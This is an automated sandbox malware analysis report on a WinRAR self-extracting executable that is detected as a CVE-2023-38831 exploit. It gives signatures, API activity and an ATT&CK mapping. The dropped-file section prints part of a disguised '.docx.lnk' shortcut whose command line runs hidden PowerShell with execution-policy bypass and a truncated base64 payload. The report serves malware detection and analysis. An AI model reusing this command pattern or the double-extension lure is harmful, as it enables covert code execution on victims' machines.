Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fcl52nBWuY.exe

Overview

General Information

Sample name:fcl52nBWuY.exe
renamed because original name is a hash value
Original sample name:86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a.exe
Analysis ID:1522691
MD5:f80c1317f5043d991a91e5fb6399e658
SHA1:b62f2cfb8d9856dd59416675bc5d0bfaa748a1be
SHA256:86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a
Tags:exeUAC-0099user-JAMESWT_MHT
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
File is packed with WinRar
Found evasive API chain (date check)
Found potential string decryption / allocating functions
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious LNK Double Extension File Created
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • fcl52nBWuY.exe (PID: 7652 cmdline: "C:\Users\user\Desktop\fcl52nBWuY.exe" MD5: F80C1317F5043D991A91E5FB6399E658)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Suspicious LNK Double Extension File Created
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\fcl52nBWuY.exe, ProcessId: 7652, TargetFilename: C:\Users\user\Desktop\???i????-623-6341-11.docx.lnk

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: fcl52nBWuY.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: fcl52nBWuY.exeReversingLabs: Detection: 65%
Source: fcl52nBWuY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: fcl52nBWuY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: fcl52nBWuY.exe
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0004BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0004BA94
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0005D410 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0005D410
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0006C4F8 FindFirstFileExA,0_2_0006C4F8
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0005B080 SetWindowLongW,NtdllDefWindowProc_W,0_2_0005B080
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_00047AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00047AAF
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_000492C60_2_000492C6
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_00057DCC0_2_00057DCC
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_000550010_2_00055001
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_000582430_2_00058243
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_000552720_2_00055272
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_000662980_2_00066298
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_000502F70_2_000502F7
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_000513F60_2_000513F6
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0005741E0_2_0005741E
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_000664C70_2_000664C7
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_000555A00_2_000555A0
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0006E5F00_2_0006E5F0
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_000507A00_2_000507A0
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0004D8330_2_0004D833
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0005889F0_2_0005889F
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0004395A0_2_0004395A
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_00044A8E0_2_00044A8E
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0006EA9E0_2_0006EA9E
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_00072BA40_2_00072BA4
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0004FCCC0_2_0004FCCC
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_00042EB60_2_00042EB6
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: String function: 00060790 appears 31 times
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: String function: 0005FEEC appears 42 times
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: String function: 0005FFC0 appears 56 times
Source: fcl52nBWuY.exe, 00000000.00000003.1445859652.00000000032DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameD3D10Warp.dllj% vs fcl52nBWuY.exe
Source: fcl52nBWuY.exe, 00000000.00000003.1444405246.00000000032DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameD3D10Warp.dllj% vs fcl52nBWuY.exe
Source: fcl52nBWuY.exe, 00000000.00000003.1446310731.00000000032DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameD3D10Warp.dllj% vs fcl52nBWuY.exe
Source: fcl52nBWuY.exe, 00000000.00000003.1445469986.00000000032DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameD3D10Warp.dllj% vs fcl52nBWuY.exe
Source: fcl52nBWuY.exe, 00000000.00000002.1455282468.00000000032DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameD3D10Warp.dllj% vs fcl52nBWuY.exe
Source: fcl52nBWuY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal56.winEXE@1/1@0/0
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_00047727 GetLastError,FormatMessageW,0_2_00047727
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0005B0BE CLSIDFromString,CoCreateInstance,0_2_0005B0BE
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0005B6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0005B6C2
Source: C:\Users\user\Desktop\fcl52nBWuY.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_4905281Jump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCommand line argument: sfxname0_2_0005F04C
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCommand line argument: sfxstime0_2_0005F04C
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCommand line argument: STARTDLG0_2_0005F04C
Source: fcl52nBWuY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\fcl52nBWuY.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: fcl52nBWuY.exeReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\fcl52nBWuY.exeFile read: C:\Users\user\Desktop\fcl52nBWuY.exeJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: dxgidebug.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: msiso.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: mlang.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Source: fcl52nBWuY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: fcl52nBWuY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: fcl52nBWuY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: fcl52nBWuY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: fcl52nBWuY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: fcl52nBWuY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: fcl52nBWuY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: fcl52nBWuY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: fcl52nBWuY.exe
Source: fcl52nBWuY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: fcl52nBWuY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: fcl52nBWuY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: fcl52nBWuY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: fcl52nBWuY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\fcl52nBWuY.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_4905281Jump to behavior
Source: fcl52nBWuY.exeStatic PE information: section name: .didat
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_000607E0 push ecx; ret 0_2_000607F3
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0005FEEC push eax; ret 0_2_0005FF0A
Source: C:\Users\user\Desktop\fcl52nBWuY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeMemory allocated: 79A0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-24132
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0004BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0004BA94
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0005D410 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0005D410
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0006C4F8 FindFirstFileExA,0_2_0006C4F8
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0005F81F VirtualQuery,GetSystemInfo,0_2_0005F81F
Source: fcl52nBWuY.exe, 00000000.00000002.1455074358.0000000003271000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\fcl52nBWuY.exeAPI call chain: ExitProcess graph end nodegraph_0-24285
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_000609FA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000609FA
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_000691A0 mov eax, dword ptr fs:[00000030h]0_2_000691A0
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0006D1E0 GetProcessHeap,0_2_0006D1E0
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_000609FA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000609FA
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_00060B8D SetUnhandledExceptionFilter,0_2_00060B8D
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_00060D7A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00060D7A
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_00064FDF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00064FDF
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_00060816 cpuid 0_2_00060816
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0005C083
Source: C:\Users\user\Desktop\fcl52nBWuY.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0005F04C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0005F04C
Source: C:\Users\user\Desktop\fcl52nBWuY.exeCode function: 0_2_0004C365 GetVersionExW,0_2_0004C365

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
DLL Side-Loading		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion		LSASS Memory21
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS2
File and Directory Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets34
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
fcl52nBWuY.exe66%ReversingLabsWin32.Exploit.CVE-2023-38831
fcl52nBWuY.exe100%AviraEXP/LNK.Agent.jkrfv

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1522691
Start date and time:2024-09-30 15:31:13 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 33s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:10
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:fcl52nBWuY.exe
renamed because original name is a hash value
Original Sample Name:86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a.exe
Detection:MAL
Classification:mal56.winEXE@1/1@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 118
  • Number of non-executed functions: 98
Cookbook Comments:
  • Found application associated with file extension: .exe

Warnings

  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: fcl52nBWuY.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\Desktop\???i????-623-6341-11.docx.lnk

Download File
Process:C:\Users\user\Desktop\fcl52nBWuY.exe
File Type:MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Wed Nov 8 04:43:43 2023, mtime=Wed Nov 8 04:43:43 2023, atime=Wed Nov 8 04:43:43 2023, length=0, window=hide
Category:dropped
Size (bytes):20332
Entropy (8bit):5.73833469346233
Encrypted:false
SSDEEP:384:BeqmQq06/c/JNjKn3kHRi13pFLQpHTdUe2IJbv27RznfCLd:nmtNV3kHRi13r0hl2IJkRjSd
MD5:C52B08EA962C2B3CA0FF41FE1ED5DBB3
SHA1:0B54EE5B102341E6D4C735382C052B6EB59C74DC
SHA-256:762C7289FB016BBCF976BD104BD8DA72E17D6D81121A846CD40480DBDD876378
SHA-512:33077CF194455557B200D94E75DFD9F1D6EC8078C88D63485D5BDAD6ED57AA61B174B7FB197722E1400C7845AAD6E2214E748566F52A531C0D0EC2B32E94D500
Malicious:false
Reputation:low
Preview:L..................Fe........Q.......Q.......Q...................................P.O. .:i.....+00.../C:\.....................2..:..HG.-..windows\system32\WindowsPowershell\v1.0\powershell.exe.........HG.-.KMI....w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.s.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e...F......M-w hidden -nop -noni -exec bypass -c $temp='UEsDBBQABgAIAAAAIQDfpNJsWgEAACAFAAATAAgCW0NvbnRlbnRfVHlwZXNdLnhtbCCiBAIooAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.786957907165894
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:fcl52nBWuY.exe
File size:339'886 bytes
MD5:f80c1317f5043d991a91e5fb6399e658
